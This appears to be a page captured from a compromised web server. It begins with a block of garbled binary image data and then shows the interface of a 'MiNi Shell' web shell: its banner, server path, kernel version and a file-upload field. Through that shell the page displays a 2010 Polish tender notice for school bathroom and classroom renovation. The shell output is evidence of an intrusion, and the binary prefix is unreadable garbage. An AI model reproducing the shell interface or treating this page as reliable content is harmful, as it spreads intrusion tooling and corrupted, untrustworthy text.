JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100202/23061-N-2010.html

<p class="kh_header"><b>Ostrów Wielkopolski: a. kontynuacja remontu łazienek uczniowskich i personelu
b. remont pomieszczenia nr 5 w budynku IV Liceum Ogolnokształcącego im.Fryderyka Chopina w Ostrowie Wielkopolskim ul.Wojska Polskiego 17</b><br>
<b>Numer ogłoszenia: 23061 - 2010; data zamieszczenia: 02.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> IV Liceum Ogólnokształcące im. Fryderyka Chopina , ul. Wojska Polskiego 17, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 0-62 5919449, 7364628, faks 0-62 5919450.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.czwarteliceum.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> a. kontynuacja remontu łazienek uczniowskich i personelu
b. remont pomieszczenia nr 5 w budynku IV Liceum Ogolnokształcącego im.Fryderyka Chopina w Ostrowie Wielkopolskim ul.Wojska Polskiego 17.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót w szczególności obejmuje:
Część I:
Kontynuacja remontu łazienek uczniowskich i personelu :

1.  REMONT  I  MODERNIZACJA  PIONU  SANITARNEGO  (ŁAZIENKI  DLA  UCZNIÓW 
     I  PERSONELU)

     1.1  Piony  sanitarne  i  wodociągowe
            1.1.1  Piony  wodociągowe  dn.  32  mm  
     1.2  Zespół  sanitarny  piwnicy
            1.2.1  Roboty  budowlane
                      1.2.1.1     Ścianki  sanitarne  
                      1.2.1.2     Drzwi  sanitarne  -  6,0  m2,
                      1.2.1.3     Podokienniki  -  2  szt.,  
                      1.2.1.4     Glazura  ścienna  -  0,64  m2,
                      1.2.1.5     Posadzka  z  płytek  -  23,41  m2
            1.2.2  Roboty  sanitarne          
                      1.2.2.1     Oczka  ustępowe  -  3  szt,   
                      1.2.2.2     Umywalka  -  4  szt.,
                      1.2.2.3     Zawory  czerpalne  -  1  szt.,
                      1.2.2.4     Baterie  umywalkowe  -  4  szt.            
            1.2.3.  Roboty  elektryczne
                      1.2.3.1     Suszarka  do  rąk  -  3  szt.

     1.3  Zespół  sanitarny  parteru
            1.3.1  Roboty  budowlane,
                      1.3.1.1     Wykonanie  ptrzesklepień  otworów  -  19,7  m
                      1.3.1.2     Warstwa  wyrównująco - niwelująca   -  46,0  m2,
                      1.3.1.3     Izolacja  przeciwwilgociowa  -  61,071  m2,
                      1.3.1.4     Izolacja  cieplna    -  46,0  m2,
                      1.3.1.5     Folia  polietylenowa  -  55,2 m2,
                      1.3.1.6     Podkład  betonowy  -  2,30  m3,
                      1.3.1.7     Ścianki  działowe  -  30,36  m2,
                      1.3.1.8     Nawietrzaki  podokienne  higrosterowalne  -  2  szt.
                      1.3.1.9     Drzwi  aluminiowe  jednoskrzydłowe  szt.  3  -  6,3  m2,
                      1.3.1.10   Drzwi  drewniane  -  2,1  m2
                      1.3.1.11   Ścianki  sanitarne  -  6,6  m2
                      1.3.1.12   Drzwi  sanitarne  -  7,2  m2,
                      1.3.1.13   Podokienniki  -  2  szt.,
                      1.3.1.14  Tynki  wewnętrzne  -  175,122  m2,
                      1.3.1.15   Glazura  ścienna  -  83,748  m2,
                      1.3.1.16   Posadzka  z  płytek  -  44,8  m2,
                      1.3.1.17   Cokolik  -  13,140 m,
                      1.3.1.18   Okładziny  z  płyt  gipsowo - kartonowych  -  57,011  m2,
                      1.3.1.19   Gładzie  gipsowe  ścian  -  57,011 m2,
                      1.3.1.20   Gładzie  sufitu  -  44,8  m2,
                      1.3.1.21   Roboty  malarskie  -  101,811 m2,
                      1.3.1.22   Dostawa,  montaż,  uruchomienie  wyposażenia  -  1  kpl.
            1.3.2  Roboty  sanitarne
                      1.3.2.1     Rurociagi  PVC  dn.  160  mm  -  24,982  m,
                      1.3.2.2     Oczka  ustępowe  -  5  szt,
                      1.3.2.3     Umywalka  -  5  szt.,
                      1.3.2.5     Wpusty  ściekowe  -  2  szt.,
                      1.3.2.6     Zawory  czerpalne  -  2 szt.,
                      1.3.2.7     Baterie  umywalkowe  -  5  szt.
                      1.3.2.8     Grzejniki  członowe  stalowe  (20  członów)  -  2  kpl.
            1.3.3  Roboty  elektryczne
                      1.3.3.1     Przewód  wtynkowy  WLZ  -  60  m,
                      1.3.3.2     Przewod  wtynkowy  -  90  m,
                      1.3.3.3     Przewód  wtynkowy  -  50  m,
                      1.3.3.4     Oprawy  oświetleniowe  -  10  szt.,
                      1.3.3.5     Gniazda  wtykowe  -  6  szt.,
                      1.3.3.6     Łączniki  -  7  szt.,
                      1.3.3.7     Pomiary  elektryczne  -  1  kpl.
                      1.3.3.8     Podgrzewacze  przepływowe  -  2  szt.

     1.4   Zespół  sanitarny  I  piętra
            1.4.1  Roboty  budowlane
                      
                      1.4.1.1     Wykonanie  ptrzesklepień  otworów  -  19,7  m
                      1.4.1.2     Warstwa  wyrównująco - niwelująca   -  44,2  m2,
                      1.4.1.3     Izolacja  przeciwwilgociowa  -  63,709  m2,
                      1.4.1.4     Izolacja  cieplna    -  44,2  m2,
                      1.4.1.5     Folia  polietylenowa  -  53,04 m2,
                      1.4.1.6     Podkład  betonowy  -  2,21 m3,
                      1.4.1.7     Ścianki  działowe  -  30,361 m2,
                      1.4.1.8     Nawietrzaki  podokienne  higrosterowalne  -  2  szt.
                      1.4.1.9     Drzwi  aluminiowe  jednoskrzydłowe  szt.  3  -  6,3  m2,
                      1.4.1.10   Drzwi  drewniane  -  2,1  m2
                      1.4.1.11   Ścianki  sanitarne  -  5,7  m2
                      1.4.1.12   Drzwi  sanitarne  -  8,0  m2,
                      1.4.1.13   Podokienniki  -  2  szt.,
                      1.4.1.14  Tynki  wewnętrzne  -  172,707  m2,
                      1.4.1.15   Glazura  ścienna  -  86,604  m2,
                      1.4.1.16   Posadzka  z  płytek  -  44,2  m2,
                      1.4.1.17   Cokolik  -  12,74 m,
                      1.4.1.18   Okładziny  z  płyt  gipsowo - kartonowych  -  56,714  m2,
                      1.4.1.19   Gładzie  gipsowe  ścian  -  57,714 m2,
                      1.4.1.20   Gładzie  sufitu  -  44,2  m2,
                      1.4.1.21   Roboty  malarskie  -  100,914 m2,
                      1.4.1.22   Dostawa,  montaż,  uruchomienie  wyposażenia  -  1  kpl.
            1.3.2  Roboty  sanitarne
                      1.3.2.1     Rurociągi  PVC  dn.  160  mm  -  16,921  m,
                      1.3.2.2     Oczka  ustępowe  -  5  szt,
                      1.3.2.3     Umywalka  -  5  szt.,
                      1.3.2.5     Wpusty  ściekowe  -  2  szt.,
                      1.3.2.6     Zawory  czerpalne  -  2 szt.,
                      1.3.2.7     Baterie  umywalkowe  -  5  szt.
                      1.3.2.8     Grzejniki  członowe  stalowe  (20  członów)  -  2  kpl.
            1.3.3  Roboty  elektryczne
                      1.3.3.1     Przewód  wtynkowy  WLZ  -  60  m,
                      1.3.3.2     Przewód   wtynkowy  -  90  m,
                      1.3.3.3     Przewód  wtynkowy  -  50  m,
                      1.3.3.4     Oprawy  oświetleniowe  -  8  szt.,
                      1.3.3.5     Gniazda  wtykowe  -  3  szt.,
                      1.3.3.6     Łączniki  -  5  szt.,
                      1.3.3.7     Pomiary  elektryczne  -  1  kpl.
                      1.3.3.8     Podgrzewacze  przepływowe

2.  ROBOTY  MALARSKIE  PODDASZA  KLATKI  SCHODOWEJ
     2.1  Gładzie  gipsowe  -  101,1  m2,
     2.2  Dwukrotne  malowanie  farbami  polwinylowymi  -  101,1  m2

3.  ROBOTY  MALARSKIE  W  SALACH  LEKCYJNYCH  PIONU  SANITARNEGO
     3.1  Gładzie  gipsowe  -  79,86  m2,
     3.2  Dwukrotne  malowanie  farba,mi  polwinylowymi  -  295,899  [m2]
              
Część II:
Remont pomieszczenia Nr 5 : 
1.    ROBOTY  ROZBIÓRKOWE
       1.1  Rozbiórka  podłogi  -  31,03  [m2],
       1.2  Skucie  tynków  -  6,912 + 4,576  [m2].

2.    ODGRZYBIANIE  ŚCIAN  ZAWILGOCONYCH
       2.1  Odgrzybianie  -  4,576  +  6,912  [m2],
       2.2  Gruntowanie  muru  -  35,766  [m2].

3.    ZAMUROWANIE  OTWORU
       3.1  uzupełnienie  scian  -  35,766  [m2].

4.    ROBOTY  TYNKARSKIE
       4.1  Obsadzenie  parapetów  -  2  szt.,
       4.2  Uzupełnienie  tynków  wewnętrznych  -  10,533  [m2],
       4.3  Gładź  gipsowa  scian  i  sufitów  -   30,067 + 32,94  [m2]. 

5.    PODŁOGA  I  POSADZKA
       5.1  Likwidacja  kanału  c.o.,
       5.2  Podłoże  -  31,030  [m2],
       5.3  Płytki  podłogowe  antypoślizgowe  -  31,030  [m2].

6.    ROBOTY  MALARSKIE
       6.1  Dwukrotene  malowanie  frabami  emulsyjnymi  ścian  i  sufitów  -  62,737  [m2],
       6.2  Dwukrotne  malowanie  farbami  olejnymi  ze  szpachlowaniem  -  32,67  [m2].

7.    STOLARKA  DRZWIOWA
       7.1  Drzwi  205 x 100  cm  -  2,05  [m2].

8.    INSTALACJA  ELEKTRYCZNA
       8.1  Przewody  instalacji  elektrycznej  -  105,99  [m],
       8.2  Montaż  opraw  oświetleniowych  -  6  szt.
       8.3  Montaż  gniazd  wtykowych  -  4  szt.
       8.4  Montaż  gniazda  RTV  -  1  szt.
       
9.    WYMIANA  GRZEJNIKÓW
       9.1  Wymiana  grzejników  -  2  kpl.
       9.2  Wymiana grzejników stalowych członowych - 2 kpl. 
10.  ZAMUROWANIE  OTWORU  DRZWIOWEGO
       10.1  Zamurowanie  otworu  drzwiowego  -  3,15  [m2].

UWAGA: ROBOTY WYKONYWANE W CZYNNYM OBIEKCIE..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8, 45.40.00.00-1, 45.31.00.00-3, 45.44.21.00-8, 45.11.00.00-1, 45.45.31.00-8, 45.41.00.00-4, 45.44.21.00-8, 45.42.11.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> dla całosci zadania: 4 387,00 zł. 
dla I Części: 3 913,00 zł.
    II częsci:    474,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli Wykonawca:
a)	w przypadku składania ofert częściowych:
 	dla CZĘŚCI I: wykonał w okresie ostatnich pięciu lat przynajmniej 1 zadanie polegające
          na wykonaniu robót obejmujące branże: ogólnobudowlaną, elektryczną, instalacji wodno-
         kanalizacyjnych  o wartości ogółem nie mniejszej 150 000,00zł brutto,z załączeniem
         dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki
         budowlanej i prawidłowo ukończone.      
                   dla części II: wykonał w okresie ostatnich pięciu lat przynajmniej 1 zadanie polegające
                  na wykonaniu robót  obejmujące branże : ogólnobudowlaną, elektryczną, instalacji
                  wodno-kanalizacyjnych o wartości ogółem nie mniejszej niż 20 000,00 zł, brutto
                  załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z
                  zasadami sztuki budowlanej i prawidłowo ukończone
                  dla całości zadania (I i II części): wykonał w okresie ostatnich pięciu lat
                  przynajmniej 1 zadanie polegające na wykonaniu robót obejmujące branże :
                  ogólnobudowlaną, elektryczną, instalacji wodno-kanalizacyjnych o wartości ogółem
                  170 000,00 zl. brutto  z załączeniem dokumentu potwierdzającego,  że  roboty zostały
                  wykonane z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony( dla obu części)jeśli wykonawca dysponuje lub
        będzie dysponował osobami do pełnienia samodzielnych funkcji technicznych, a w szczególności:
a.	kierownika budowy (uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej oraz aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego),
b.	kierownika robót (uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wodociągowych i kanalizacyjnych oraz aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego),
c.	kierownika robót (uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych oraz aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez wykonawcę, jeżeli: 
       jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności:
      		- dla części I - na kwotę nie mniejszą niż 150 000,00 zł 
                   - dla części II - na kwotę nie mniejszą niż 20 000,00 zł 
                   - dla całości zadania:  (I i II część) - na kwotę nie mniejszą niż 170 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zakres rzeczowy powierzony podwykonawcom zał. nr 5</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.czwarteliceum.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> IV Liceum Ogolnokształcące im.Fryderyka Chopina w Ostrowie Wielkpolskim 
ul.Wojska Polskiego 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2010 godzina 11:00, miejsce: sekretariat IV Liceum Ogólnokształcącego im.Fryderyka Chopina 
63-400 Ostrów Wielkopolski ul.Wojska Polskiego 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
